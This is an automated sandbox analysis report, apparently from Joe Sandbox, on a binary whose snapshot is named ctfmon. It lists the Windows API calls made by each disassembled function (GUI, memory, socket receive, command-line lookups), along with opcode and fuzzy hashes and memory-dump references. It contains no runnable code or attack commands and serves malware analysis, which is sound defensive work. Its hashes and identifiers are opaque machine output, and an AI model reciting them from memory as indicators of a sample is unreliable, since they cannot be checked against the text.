        • Opcode Fuzzy Hash: e99812611a21f9011ea4a185b951aeef274692d9465cad14e96c1549da805e4a
        • Instruction Fuzzy Hash: F4E0483AF15136D5D71137B4BD4876A25945B58351FE10077DA01433519A3C4483DB7E
        APIs
        • TlsGetValue.KERNEL32(00000000,0053EDA8,00000000,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A18
        • EnterCriticalSection.KERNEL32(0000001C,00000010,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A67
        • LeaveCriticalSection.KERNEL32(0000001C,00000000,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A7A
        • LocalAlloc.KERNEL32(00000000,?,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428A90
        • LocalReAlloc.KERNEL32(?,?,00000002,?,00000000,?,00428C75,0053EDA8,00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F), ref: 00428AA2
        • TlsSetValue.KERNEL32(00000000,00000000), ref: 00428ADE
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AllocCriticalLocalSectionValue$EnterLeave
        • String ID:
        • API String ID: 4117633390-0
        • Opcode ID: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
        • Instruction ID: 683b195803cd3318d752987fd83c5c11aee9b06666c6d2078921f9177f6cc79e
        • Opcode Fuzzy Hash: 13d111e48e1bc65edc326abf01420470da07a7052a1c5e31779b3603b3111ea6
        • Instruction Fuzzy Hash: 4F31AB31200615EFD724CF15D88AF6AB3A8FF44354F80892EE41AC7690DB74E816CB64
        APIs
        • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041F348
        • GetWindowTextLengthA.USER32(?), ref: 0041F352
        • GetWindowTextA.USER32(?,00000000,00000000), ref: 0041F37A
        • SetTextColor.GDI32(?,?), ref: 0041F3BB
        • DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 0041F3D3
        • SetTextColor.GDI32(?,?), ref: 0041F3E5
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Text$ColorWindow$DrawLength
        • String ID:
        • API String ID: 1177705772-0
        • Opcode ID: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
        • Instruction ID: b26f12578afaccc9f8427d079972224ff864cef3ef88deb0b21f074a4f367360
        • Opcode Fuzzy Hash: 85627abb918a3084de23618f61da1971933a665179132a7b318545b2f05277eb
        • Instruction Fuzzy Hash: 6D215C76600108AFC724DF98DC84ABF77A9EF84321B148229FD1997390D634AD45CB64
        APIs
        • __EH_prolog.LIBCMT ref: 0042280E
        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042285B
        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 0042287D
        • GetCapture.USER32 ref: 0042288F
        • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0042289E
        • WinHelpW.USER32(?,?,?,?), ref: 004228B2
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: MessageSend$CaptureH_prologHelp
        • String ID:
        • API String ID: 432264411-0
        • Opcode ID: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
        • Instruction ID: 321176f5cdc229f6ee6c7f21b62b50d57b21ffd69a4491bdf23897e4f3332011
        • Opcode Fuzzy Hash: 351ca17ef3e89ffa8c86497c2370513ed9314193ee064a8a9955204cf86f37c4
        • Instruction Fuzzy Hash: 44219131340214BFEB30AF65DC89F6E7BA9EF04744F40456DB1019B1E2CB799C008624
        APIs
        • GetParent.USER32(?), ref: 004271E6
        • GetLastActivePopup.USER32(?), ref: 004271F5
        • IsWindowEnabled.USER32(?), ref: 0042720A
        • EnableWindow.USER32(?,00000000), ref: 0042721D
        • GetWindowLongW.USER32(?,000000F0), ref: 0042722F
        • GetParent.USER32(?), ref: 0042723D
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
        • String ID:
        • API String ID: 670545878-0
        • Opcode ID: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
        • Instruction ID: b477ea236e12bf6e9f048e8246984b22bba05b7c439d68dba564573c6702b4fa
        • Opcode Fuzzy Hash: 829b2fd447a7a265a2830058b677b447dcf963bf07e075df5b6d77de7654244f
        • Instruction Fuzzy Hash: F811A332B093319787316A6ABD94B3B729C5F55B50FC501A6FD00E3301DB28DD1246BD
        APIs
        • GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF64
        • GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF76
        • GetCommandLineW.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF8D
        • GetCommandLineA.KERNEL32(?,00000000,?,?,0040D0B4), ref: 0040FF96
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFAF
        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,0040D0B4), ref: 0040FFD4
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CommandLine$ByteCharMultiWide
        • String ID:
        • API String ID: 3068183746-0
        • Opcode ID: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
        • Instruction ID: 64f274b490bb9753f35f974b03313c599961d3a4b4ccc6cea9b6a40c69df2725
        • Opcode Fuzzy Hash: 3c780290e16532da1a94cc39dc3a8878b2115943691280b670c6d4727a397ac2
        • Instruction Fuzzy Hash: E011C83270911B6BDA3057A69C40F2B369CDB533A4F210177F500F6BD0DAB5DC4956A9
        APIs
        • WaitForSingleObject.KERNEL32(00000348,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
        • ResetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F47
        • SetEvent.KERNEL32(0000034C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
        • WaitForSingleObject.KERNEL32(0000034C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
        • Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
        • SetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F9E
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Event$ObjectSingleWait$ResetSleep
        • String ID:
        • API String ID: 3757991767-0
        • Opcode ID: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
        • Instruction ID: cce5b26dfa6e14c825b22c7865c66c1ad55053d17271cdbe5a1c1e3b5b80d322
        • Opcode Fuzzy Hash: c552385a51d22ba56084d703d5a1d3e4d9b6c6ab6055f6c746357635fa96cf77
        • Instruction Fuzzy Hash: 910171767002115BCA14DB68FD8491E73B9F79C7207540629E905A33E0CBB4E805DB74
        APIs
        • ClientToScreen.USER32(?,?), ref: 004269D4
        • GetWindow.USER32(?,00000005), ref: 004269E5
        • GetDlgCtrlID.USER32(00000000), ref: 004269EE
        • GetWindowLongW.USER32(00000000,000000F0), ref: 004269FD
        • GetWindowRect.USER32(00000000,?), ref: 00426A0F
        • PtInRect.USER32(?,?,?), ref: 00426A1F
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Rect$ClientCtrlLongScreen
        • String ID:
        • API String ID: 1315500227-0
        • Opcode ID: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
        • Instruction ID: 1c1bb1606c7b6fcb0188c767b7bd5df6e6ab6d9813dcdc4c782d48c425fdd25b
        • Opcode Fuzzy Hash: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
        • Instruction Fuzzy Hash: 6F018435340135BBDB219F55AC48EEF7B6CFF06710F818032F911A1164DB34D9568B98
        APIs
        • __EH_prolog.LIBCMT ref: 004099BE
        • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00409ADA
        • CoTaskMemFree.OLE32(?,?,00000000), ref: 00409CC1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Task$AllocFreeH_prolog
        • String ID: $(
        • API String ID: 1522537378-55695022
        • Opcode ID: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
        • Instruction ID: e45d171d2f1bb2aaac46846c8d0f16db648deb0d3cfea91ab4a4292c5bbd6be5
        • Opcode Fuzzy Hash: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
        • Instruction Fuzzy Hash: 7AB10970A002059FDB14DFA9C884AAEFBF5FF88304B20496EE016EB291D775AD45CF54
        APIs
        • select.WS2_32(00000001,?,00000000,00000000,00000014), ref: 0040491E
        • recv.WS2_32(00000000,023A0000,000186A0,00000000), ref: 00404953
        • closesocket.WS2_32(00000000), ref: 00404A22
        • closesocket.WS2_32(00000000), ref: 00404A46
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: closesocket$recvselect
        • String ID: +*&=^^^^--------PTPM1
        • API String ID: 3519190455-393624235
        • Opcode ID: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
        • Instruction ID: a15c9d51dc272b9fe545b8961346552fe0b4d2b02f1de687d51cf6678d7e3f35
        • Opcode Fuzzy Hash: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
        • Instruction Fuzzy Hash: 6951B2762002009FC704CF24FC40B67BBF5F7A8314F548539E994A73A1D7B9A989EBA5
        APIs
        • GetVersionExA.KERNEL32 ref: 004102C2
        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004102F7
        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00410357
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: EnvironmentFileModuleNameVariableVersion
        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
        • API String ID: 1385375860-4131005785
        • Opcode ID: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
        • Instruction ID: 126d5043a1f7e65bc2068d23c44456634c671ba06e8d0b95b91ab4156e3e84ef
        • Opcode Fuzzy Hash: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
        • Instruction Fuzzy Hash: 44314A7194534CAFEB3187705C95BDF37689B06308F5404DBD894D6242D6F88EC68B1D
        APIs
        • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004223A9
        • GetWindowLongW.USER32(?,000000FC), ref: 004223BA
        • GetWindowLongW.USER32(?,000000FC), ref: 004223CA
        • SetWindowLongW.USER32(?,000000FC,?), ref: 004223E6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: LongWindow$MessageSend
        • String ID: (
        • API String ID: 2178440468-3887548279
        • Opcode ID: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
        • Instruction ID: 0887fd1d8c57f0dc07a948d484ba5af13b1aab812eb589b308dbb2651f147842
        • Opcode Fuzzy Hash: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
        • Instruction Fuzzy Hash: 8E31AE31700620AFDB21EF75E984B6FBBA4BF04314F90452EE94197691DBB9A805CB98
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FreeString$ClearVariant
        • String ID: `DvP?Dv
        • API String ID: 3349467263-2995021381
        • Opcode ID: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
        • Instruction ID: 3575c1e55b8ebace504c8559d5d8e129edef3a0f818806659e3e1524f78f469a
        • Opcode Fuzzy Hash: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
        • Instruction Fuzzy Hash: 6E313971A00229FFCB14DFA5C884ADEBBB8FF48710F50842AF509A6281D774A944CFA4
        APIs
        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A
          • Part of subcall function 00429348: lstrlenW.KERNEL32(?,0042928B,?,?), ref: 0042937C
        • lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
        • lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: FileModuleNamelstrcatlstrcpylstrlen
        • String ID: .HLP$.INI
        • API String ID: 2421895198-3011182340
        • Opcode ID: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
        • Instruction ID: 5354100141cd0111f2c83c4e759e606604062e502d5c36874ba2bea8a0f2629b
        • Opcode Fuzzy Hash: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
        • Instruction Fuzzy Hash: E53142B1900719EFDB20DFA5D885AC6B7F8AF08304F5049BBE54AD3151DB34AD848B68
        APIs
          • Part of subcall function 004271B3: GetParent.USER32(?), ref: 004271E6
          • Part of subcall function 004271B3: GetLastActivePopup.USER32(?), ref: 004271F5
          • Part of subcall function 004271B3: IsWindowEnabled.USER32(?), ref: 0042720A
          • Part of subcall function 004271B3: EnableWindow.USER32(?,00000000), ref: 0042721D
        • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00427071
        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004270DF
        • MessageBoxW.USER32(00000000,?,?,00000000), ref: 004270ED
        • EnableWindow.USER32(00000000,00000001), ref: 00427109
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
        • String ID: PMB
        • API String ID: 1958756768-1324934742
        • Opcode ID: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
        • Instruction ID: 4949e603ba3b1f5991230ca5172b941e34d29e6685895596331aeb27549c8e70
        • Opcode Fuzzy Hash: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
        • Instruction Fuzzy Hash: 8521D672B04128AFDB209F94DCC5BAFB7B9EB44350F94042AE514E3350C7799D498BA4
        APIs
        • GetWindowLongW.USER32(?,000000F0), ref: 00420EF4
        • GetDlgItem.USER32(?,00000002), ref: 00420F13
        • IsWindowEnabled.USER32(00000000), ref: 00420F1E
        • SendMessageW.USER32(?,00000111,00000002,00000000), ref: 00420F34
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$EnabledItemLongMessageSend
        • String ID: Edit
        • API String ID: 3499652902-554135844
        • Opcode ID: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
        • Instruction ID: 60899dcfc3587a15ced3cc413fca3ebc9283b805f23eb41fcd32d928ea0cbd6c
        • Opcode Fuzzy Hash: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
        • Instruction Fuzzy Hash: 40010830380231AAEA306B26BD09B7BB7E59F10760FD24427F401E22E2CBE8D856C11C
        APIs
        • GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
        • GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
        • MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
        • MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ViewportWindow
        • String ID: tw@
        • API String ID: 1589084482-3122378559
        • Opcode ID: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
        • Instruction ID: ce0e09d475a622cb5eb5a1da7693da6cd9b819a777b60fa32cf6f8d38c90c4e5
        • Opcode Fuzzy Hash: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
        • Instruction Fuzzy Hash: 7AF01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94
        APIs
        • GetStartupInfoA.KERNEL32(?), ref: 0041004A
        • GetFileType.KERNEL32(?,?,00000000), ref: 004100F5
